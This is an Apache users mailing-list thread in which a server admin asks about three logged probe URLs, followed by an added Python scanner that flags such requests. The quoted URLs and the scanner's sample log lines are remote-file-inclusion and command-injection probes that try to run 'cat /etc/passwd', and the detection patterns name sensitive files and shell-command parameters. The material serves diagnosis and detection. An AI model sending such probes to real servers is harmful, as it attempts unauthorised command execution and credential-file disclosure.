From: rahul bhola
To: users@httpd.apache.org
Date: Wed, 12 Feb 2014 22:13:49 +0530
Subject: Re: [users@httpd] Possible exploit?
In-Reply-To: <52FBA131.1010707@knutejohnson.com>
References: <52FB9A18.4020303@knutejohnson.com> <52FBA131.1010707@knutejohnson.com>

Because of the HTTP response 302, a safe bet would be to say he didn't get anything. Still, I would recommend you sanitize the data you get from the parameters command and cmd. Also, simply go to the URL to see what he saw.

On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson wrote:
> On 2/12/2014 08:04, rahul bhola wrote:
>
>> In the first and last case he was checking if it is possible to pass shell
>> commands through the command or cmd parameter. Not sure on the second one, but it
>> looks like he was testing for an unsanitized URL redirection vulnerability.
>>
>> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson wrote:
>>
>>     I found the following in my log this morning. Does anybody know
>>     what it really means? Thanks.
>>
>>     A total of 3 possible successful probes were detected (the following URLs
>>     contain strings that match one or more of a listing of strings that
>>     indicate a possible exploit):
>>
>>     /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd
>>     HTTP Response 302
>>
>>     /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt?
>>     HTTP Response 302
>>
>>     /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd
>>     HTTP Response 302
>>
>>     --
>>     Knute Johnson
>>
>>     ---------------------------------------------------------------------
>>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>     For additional commands, e-mail: users-help@httpd.apache.org
>>
>> --
>> Rahul Bhola
>> B.E.
>> computers
>> Core Member
>> Department of backstage
>> Bits Pilani KK Birla Goa Campus
>
> So you think he was trying to get the content of my passwd file? So what
> would that get him?
>
> Is it possible to do this myself to see what he could have gotten?
>
> Thanks,
>
> --
> Knute Johnson

--
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus
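As an added example (not code from the thread's participants or from the httpd project), the following Python scanner applies the kind of string matching that the log-analysis report Knute quoted describes, run over Apache combined-format access-log lines. The sample lines are constructed to resemble the three requests above; the client addresses, timestamps and byte counts are made up. It flags a parameter whose value is an absolute URL (the remote-inclusion style probe), any reference to /etc/passwd, and the cmd/command parameter names, and pairs each hit with what the status code implies. The caveat a practitioner wants: a 302 means the client was redirected, which is consistent with the payload never being processed, but the access log alone cannot prove the application did not act on the parameter; the firm answer comes from checking that the handlers for those parameters neither include remote files nor pass values to a shell.

```python
"""Scan Apache access-log lines for the probe patterns discussed in the thread.

Added example, not code from the thread or from httpd. The log lines below are
constructed to resemble the three requests Knute posted; the client addresses,
timestamps and byte counts are made up.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2014:06:21:10 -0800] "GET /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP/1.1" 302 221 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:06:21:11 -0800] "GET /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP/1.1" 302 221 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:06:21:12 -0800] "GET /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP/1.1" 302 221 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Feb/2014:06:25:00 -0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Only the fields the scanner needs are captured by name.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures are matched against the percent-decoded request target, so that
# "cat%20/etc/passwd" and "cat /etc/passwd" are treated alike.
SIGNATURES = [
    # a parameter whose value is an absolute URL: remote-file-inclusion style probe
    ("remote-url-in-parameter", re.compile(r"=(?:https?|ftp)://", re.I)),
    # an attempt to read a well-known sensitive file
    ("sensitive-file-path", re.compile(r"/etc/(?:passwd|shadow)", re.I)),
    # parameter names commonly abused to pass a shell command
    ("shell-command-parameter", re.compile(r"[?&](?:cmd|command|exec)=", re.I)),
]


def verdict(status: int) -> str:
    """What the response status says about what the prober got back."""
    if 200 <= status < 300:
        return "served"       # a body was returned: inspect the application, not just the log
    if 300 <= status < 400:
        return "redirected"   # client was sent elsewhere; payload most likely not processed
    if 400 <= status < 500:
        return "rejected"
    return "error"


def scan_line(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("target"))
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not hits:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "target": m.group("target"),
        "status": status,
        "verdict": verdict(status),
        "signatures": hits,
    }


def scan_log(text: str):
    """Scan every line of an access log and return the findings in log order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} ({f['verdict']}): {', '.join(f['signatures'])}")
        print(f"    {f['target']}")
```

Run against the constructed sample, the three probe lines are reported with verdict "redirected" and the ordinary /index.html request is ignored. On a real server, pipe the live access log through scan_log and treat any "served" verdict on a flagged request as the one to investigate first.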